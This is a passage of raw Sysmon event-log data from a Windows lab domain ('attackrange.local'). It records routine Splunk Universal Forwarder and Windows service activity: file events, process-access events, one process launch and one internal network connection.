23542300x8000000000000000809569Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.584{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D45A80A6917A45AAEEBFDE90DAC48B6D,SHA256=52FF31AB076F420C1CAE65BB1CAD9EED00109EF4840FBC14F2663868B9E21254,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809568Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.584{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BBFB089F7FA3D5EA09BAC4C6149D5C7,SHA256=576192195BB6402DC06C9DDA0B76A8268A3506E6BD7F85616B1C17197A825640,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809567Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F74D-60EB-C179-00000000D001}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809566Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809565Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809564Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809563Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809562Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809561Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809560Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809559Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809558Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809557Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F74D-60EB-C179-00000000D001}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809556Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F74D-60EB-C179-00000000D001}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809555Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.038{0C1E0330-F74D-60EB-C179-00000000D001}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001053071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:17.615{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61901-false10.0.1.12-8000- 23542300x80000000000000001053070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:26.336{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE6F3E9B2EB23980FFFF9D1733316BFD,SHA256=06081532C247C8A750252E7B390F0E3EC2C2C71EF343E5FA90179D7F07AE92AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809598Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.740{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D45A80A6917A45AAEEBFDE90DAC48B6D,SHA256=52FF31AB076F420C1CAE65BB1CAD9EED00109EF4840FBC14F2663868B9E21254,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809597Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.412{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F74E-60EB-C379-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809596Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809595Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809594Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809593Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809592Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809591Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809590Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809589Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.396{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809588Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:26.396{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809587Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.396{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F74E-60EB-C379-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809586Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.396{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F74E-60EB-C379-00000000D001}3884C:\Program 